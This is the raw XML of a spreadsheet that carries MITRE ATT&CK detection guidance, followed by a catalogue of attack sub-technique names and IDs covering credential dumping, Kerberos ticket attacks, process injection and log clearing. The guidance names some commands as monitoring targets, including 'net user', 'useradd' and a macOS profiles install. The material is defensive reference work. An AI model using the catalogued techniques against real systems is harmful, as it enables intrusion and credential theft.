    <t>Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions.</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 
These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 
Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process.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 </t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078)</t>
  </si>
  <si>
    <t>Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. 
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.</t>
  </si>
  <si>
    <t xml:space="preserve">Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t>Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t xml:space="preserve">Command-line invocation of tools capable of modifying services may be unusual and can be monitored for and alerted on, depending on how systems are typically used in a particular environment. 
</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
On macOS, monitor the command line for usage of the profiles tool, such as &lt;code&gt;profiles install -type=configuration&lt;/code&gt;. Additionally, all installed extensions maintain a &lt;code&gt;plist&lt;/code&gt; file in the &lt;code&gt;/Library/Managed Preferences/username/&lt;/code&gt; directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with account creation, such as &lt;code&gt;net user&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. 
Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.
In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. </t>
  </si>
  <si>
    <t>Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as &lt;code&gt;mount&lt;/code&gt; (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)
Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>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</si>
  <si>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Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.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</si>
  <si>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Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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</si>
  <si>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Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.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</si>
  <si>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Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. 
Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. 
Once adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.</t>
  </si>
  <si>
    <t xml:space="preserve">Much of this takes place outside the visibility of the target organization, making detection difficult for defenders. 
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. </t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t xml:space="preserve"> Remote Email Collection
T1114.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Local Email Collection
T1114.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Email Forwarding Rule
T1114.003</t>
  </si>
  <si>
    <t xml:space="preserve"> LLMNR/NBT-NS Poisoning and SMB Relay
T1557.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Credential API Hooking
T1056.004</t>
  </si>
  <si>
    <t xml:space="preserve"> ARP Cache Poisoning
T1557.002</t>
  </si>
  <si>
    <t xml:space="preserve"> DHCP Spoofing
T1557.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Web Portal Capture
T1056.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Keylogging
T1056.001</t>
  </si>
  <si>
    <t xml:space="preserve"> GUI Input Capture
T1056.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Sharepoint
T1213.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Confluence
T1213.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Code Repositories
T1213.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Device Configuration Dump
T1602.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Archive via Custom Method
T1560.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Archive via Library
T1560.002</t>
  </si>
  <si>
    <t xml:space="preserve"> SNMP (MIB Dump)
T1602.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Local Data Staging
T1074.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Remote Data Staging
T1074.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Archive via Utility
T1560.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Mail Protocols
T1071.003</t>
  </si>
  <si>
    <t xml:space="preserve"> DNS Calculation
T1568.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Generation Algorithms
T1568.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Fast Flux DNS
T1568.001</t>
  </si>
  <si>
    <t xml:space="preserve"> DNS
T1071.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Web Protocols
T1071.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Asymmetric Cryptography
T1573.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Symmetric Cryptography
T1573.001</t>
  </si>
  <si>
    <t xml:space="preserve"> File Transfer Protocols
T1071.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Socket Filters
T1205.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Port Knocking
T1205.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Standard Encoding
T1132.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Multi-hop Proxy
T1090.003</t>
  </si>
  <si>
    <t xml:space="preserve"> One-Way Communication
T1102.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Bidirectional Communication
T1102.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Steganography
T1001.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Protocol Impersonation
T1001.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Junk Data
T1001.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Non-Standard Encoding
T1132.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Fronting
T1090.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Internal Proxy
T1090.001</t>
  </si>
  <si>
    <t xml:space="preserve"> External Proxy
T1090.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Dead Drop Resolver
T1102.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Provider DLL
T1556.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Private Keys
T1552.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Chat Messages
T1552.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Instance Metadata API
T1552.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Container API
T1552.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Password Spraying
T1110.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Group Policy Preferences
T1552.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Password Guessing
T1110.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Password Cracking
T1110.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Credential Stuffing
T1110.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Reversible Encryption
T1556.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Bash History
T1552.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Pluggable Authentication Modules
T1556.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Device Authentication
T1556.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Multi-Factor Authentication
T1556.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Hybrid Identity
T1556.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Controller Authentication
T1556.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Password Filter DLL
T1556.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Credentials In Files
T1552.001</t>
  </si>
  <si>
    <t xml:space="preserve"> /etc/passwd and /etc/shadow
T1003.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Credentials in Registry
T1552.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Cached Domain Credentials
T1003.005</t>
  </si>
  <si>
    <t xml:space="preserve"> DCSync
T1003.006</t>
  </si>
  <si>
    <t xml:space="preserve"> LSA Secrets
T1003.004</t>
  </si>
  <si>
    <t xml:space="preserve"> LSASS Memory
T1003.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Proc Filesystem
T1003.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Secrets Management Stores
T1555.006</t>
  </si>
  <si>
    <t xml:space="preserve"> SAML Tokens
T1606.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Web Cookies
T1606.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Windows Credential Manager
T1555.004</t>
  </si>
  <si>
    <t xml:space="preserve"> NTDS
T1003.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Securityd Memory
T1555.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Golden Ticket
T1558.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Silver Ticket
T1558.002</t>
  </si>
  <si>
    <t xml:space="preserve"> AS-REP Roasting
T1558.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Security Account Manager
T1003.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Credentials from Web Browsers
T1555.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Keychain
T1555.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Password Managers
T1555.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Kerberoasting
T1558.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Local Accounts
T1078.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Web Session Cookie
T1550.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Pass the Hash
T1550.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Application Access Token
T1550.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Pass the Ticket
T1550.003</t>
  </si>
  <si>
    <t xml:space="preserve"> TFTP Boot
T1542.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Bootkit
T1542.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Component Firmware
T1542.002</t>
  </si>
  <si>
    <t xml:space="preserve"> ROMMONkit
T1542.004</t>
  </si>
  <si>
    <t xml:space="preserve"> System Firmware
T1542.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Dylib Hijacking
T1574.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Services Registry Permissions Weakness
T1574.011</t>
  </si>
  <si>
    <t xml:space="preserve"> Services File Permissions Weakness
T1574.010</t>
  </si>
  <si>
    <t xml:space="preserve"> Path Interception by Search Order Hijacking
T1574.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Accounts
T1078.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Default Accounts
T1078.001</t>
  </si>
  <si>
    <t xml:space="preserve"> SIP and Trust Provider Hijacking
T1553.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Mark-of-the-Web Bypass
T1553.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Install Root Certificate
T1553.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Gatekeeper Bypass
T1553.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Code Signing Policy Modification
T1553.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Mshta
T1218.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Disable or Modify Tools
T1562.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Path Interception by PATH Environment Variable
T1574.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Environmental Keying
T1480.001</t>
  </si>
  <si>
    <t xml:space="preserve"> System Checks
T1497.001</t>
  </si>
  <si>
    <t xml:space="preserve"> User Activity Based Checks
T1497.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Time Based Evasion
T1497.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Accounts
T1078.004</t>
  </si>
  <si>
    <t xml:space="preserve"> KernelCallbackTable
T1574.013</t>
  </si>
  <si>
    <t xml:space="preserve"> Thread Local Storage
T1055.005</t>
  </si>
  <si>
    <t xml:space="preserve"> DLL Search Order Hijacking
T1574.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Proc Memory
T1055.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Create Process with Token
T1134.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Make and Impersonate Token
T1134.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Asynchronous Procedure Call
T1055.004</t>
  </si>
  <si>
    <t xml:space="preserve"> ListPlanting
T1055.015</t>
  </si>
  <si>
    <t xml:space="preserve"> Portable Executable Injection
T1055.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Parent PID Spoofing
T1134.004</t>
  </si>
  <si>
    <t xml:space="preserve"> SID-History Injection
T1134.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Temporary Elevated Cloud Access
T1548.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Token Impersonation/Theft
T1134.001</t>
  </si>
  <si>
    <t xml:space="preserve"> COR_PROFILER
T1574.012</t>
  </si>
  <si>
    <t xml:space="preserve"> DLL Side-Loading
T1574.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Path Interception by Unquoted Path
T1574.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Extra Window Memory Injection
T1055.011</t>
  </si>
  <si>
    <t xml:space="preserve"> Bypass User Account Control
T1548.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Elevated Execution with Prompt
T1548.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Setuid and Setgid
T1548.001</t>
  </si>
  <si>
    <t xml:space="preserve"> VDSO Hijacking
T1055.014</t>
  </si>
  <si>
    <t xml:space="preserve"> Executable Installer File Permissions Weakness
T1574.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Trust Modification
T1484.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Dynamic-link Library Injection
T1055.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Thread Execution Hijacking
T1055.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Ptrace System Calls
T1055.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Process Hollowing
T1055.012</t>
  </si>
  <si>
    <t xml:space="preserve"> Process Doppelgänging
T1055.013</t>
  </si>
  <si>
    <t xml:space="preserve"> Sudo and Sudo Caching
T1548.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Group Policy Modification
T1484.001</t>
  </si>
  <si>
    <t xml:space="preserve"> CMSTP
T1218.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Dynamic Linker Hijacking
T1574.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Control Panel
T1218.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Email Hiding Rules
T1564.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Hidden File System
T1564.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Hidden Files and Directories
T1564.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Hidden Users
T1564.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Hidden Window
T1564.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Safe Mode Boot
T1562.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Ignore Process Interrupts
T1564.011</t>
  </si>
  <si>
    <t xml:space="preserve"> Process Argument Spoofing
T1564.010</t>
  </si>
  <si>
    <t xml:space="preserve"> Resource Forking
T1564.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Run Virtual Instance
T1564.006</t>
  </si>
  <si>
    <t xml:space="preserve"> VBA Stomping
T1564.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Disable Windows Event Logging
T1562.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Disable or Modify Cloud Firewall
T1562.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Disable or Modify Cloud Logs
T1562.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Disable or Modify Linux Audit System
T1562.012</t>
  </si>
  <si>
    <t xml:space="preserve"> Disable or Modify System Firewall
T1562.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Downgrade Attack
T1562.010</t>
  </si>
  <si>
    <t xml:space="preserve"> Disable Crypto Hardware
T1600.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Windows File and Directory Permissions Modification
T1222.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Linux and Mac File and Directory Permissions Modification
T1222.002</t>
  </si>
  <si>
    <t xml:space="preserve"> PubPrn
T1216.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Clear Command History
T1070.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Clear Mailbox Data
T1070.008</t>
  </si>
  <si>
    <t xml:space="preserve"> MSBuild
T1127.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Clear Linux or Mac System Logs
T1070.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Clear Network Connection History and Configurations
T1070.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Clear Persistence
T1070.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Impair Command History Logging
T1562.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Clear Windows Event Logs
T1070.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Share Connection Removal
T1070.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Timestomp
T1070.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Spoof Security Alerting
T1562.011</t>
  </si>
  <si>
    <t xml:space="preserve"> Command Obfuscation
T1027.010</t>
  </si>
  <si>
    <t xml:space="preserve"> Indicator Blocking
T1562.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Compiled HTML File
T1218.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Reduce Key Space
T1600.001</t>
  </si>
  <si>
    <t xml:space="preserve"> File Deletion
T1070.004</t>
  </si>
  <si>
    <t xml:space="preserve"> NTFS File Attributes
T1564.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Double File Extension
T1036.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Right-to-Left Override
T1036.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Binary Padding
T1027.001</t>
  </si>
  <si>
    <t xml:space="preserve"> InstallUtil
T1218.004</t>
  </si>
  <si>
    <t xml:space="preserve"> MMC
T1218.014</t>
  </si>
  <si>
    <t xml:space="preserve"> Msiexec
T1218.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Odbcconf
T1218.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Space after Filename
T1036.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Compile After Delivery
T1027.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Rename System Utilities
T1036.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Match Legitimate Name or Location
T1036.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Masquerade Task or Service
T1036.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Masquerade File Type
T1036.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Invalid Code Signature
T1036.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Break Process Trees
T1036.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Regsvcs/Regasm
T1218.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Code Signing
T1553.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Rundll32
T1218.011</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Address Translation Traversal
T1599.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Verclsid
T1218.012</t>
  </si>
  <si>
    <t xml:space="preserve"> Dynamic API Resolution
T1027.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Mavinject
T1218.013</t>
  </si>
  <si>
    <t xml:space="preserve"> Fileless Storage
T1027.011</t>
  </si>
  <si>
    <t xml:space="preserve"> Regsvr32
T1218.010</t>
  </si>
  <si>
    <t xml:space="preserve"> Create Snapshot
T1578.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Delete Cloud Instance
T1578.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Embedded Payloads
T1027.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Revert Cloud Instance
T1578.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Downgrade System Image
T1601.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Modify Cloud Compute Configurations
T1578.005</t>
  </si>
  <si>
